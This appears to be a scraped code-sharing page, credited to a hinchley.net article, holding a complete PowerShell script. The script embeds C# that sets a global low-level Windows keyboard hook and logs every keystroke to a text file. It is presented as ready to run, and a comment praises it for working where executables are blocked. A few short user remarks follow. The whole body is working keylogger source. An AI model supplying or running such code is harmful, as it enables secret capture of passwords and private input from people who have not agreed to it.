Original Source: https://hinchley.net/articles/creating-a-key-logger-via-a-global-system-hook-using-powershell/
This is also very useful for running C# from PowerShell in general.
Original Source: https://hinchley.net/articles/creating-a-key-logger-via-a-global-system-hook-using-powershell/
This is also very useful for running C# from PowerShell in general.
Add-Type -TypeDefinition @" | |
using System; | |
using System.IO; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Windows.Forms; | |
namespace KeyLogger { | |
public static class Program { | |
private const int WH_KEYBOARD_LL = 13; | |
private const int WM_KEYDOWN = 0x0100; | |
private const string logFileName = "log.txt"; | |
private static StreamWriter logFile; | |
private static HookProc hookProc = HookCallback; | |
private static IntPtr hookId = IntPtr.Zero; | |
public static void Main() { | |
logFile = File.AppendText(logFileName); | |
logFile.AutoFlush = true; | |
hookId = SetHook(hookProc); | |
Application.Run(); | |
UnhookWindowsHookEx(hookId); | |
} | |
private static IntPtr SetHook(HookProc hookProc) { | |
IntPtr moduleHandle = GetModuleHandle(Process.GetCurrentProcess().MainModule.ModuleName); | |
return SetWindowsHookEx(WH_KEYBOARD_LL, hookProc, moduleHandle, 0); | |
} | |
private delegate IntPtr HookProc(int nCode, IntPtr wParam, IntPtr lParam); | |
private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam) { | |
if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN) { | |
int vkCode = Marshal.ReadInt32(lParam); | |
logFile.WriteLine((Keys)vkCode); | |
} | |
return CallNextHookEx(hookId, nCode, wParam, lParam); | |
} | |
[DllImport("user32.dll")] | |
private static extern IntPtr SetWindowsHookEx(int idHook, HookProc lpfn, IntPtr hMod, uint dwThreadId); | |
[DllImport("user32.dll")] | |
private static extern bool UnhookWindowsHookEx(IntPtr hhk); | |
[DllImport("user32.dll")] | |
private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam); | |
[DllImport("kernel32.dll")] | |
private static extern IntPtr GetModuleHandle(string lpModuleName); | |
} | |
} | |
"@ -ReferencedAssemblies System.Windows.Forms | |
[KeyLogger.Program]::Main(); |
Its C# wrapped in powershell. lol
yup, useful if you don't have the ability to run executables 😊
Its C# wrapped in powershell. lol
No shit
Its C# wrapped in powershell. lol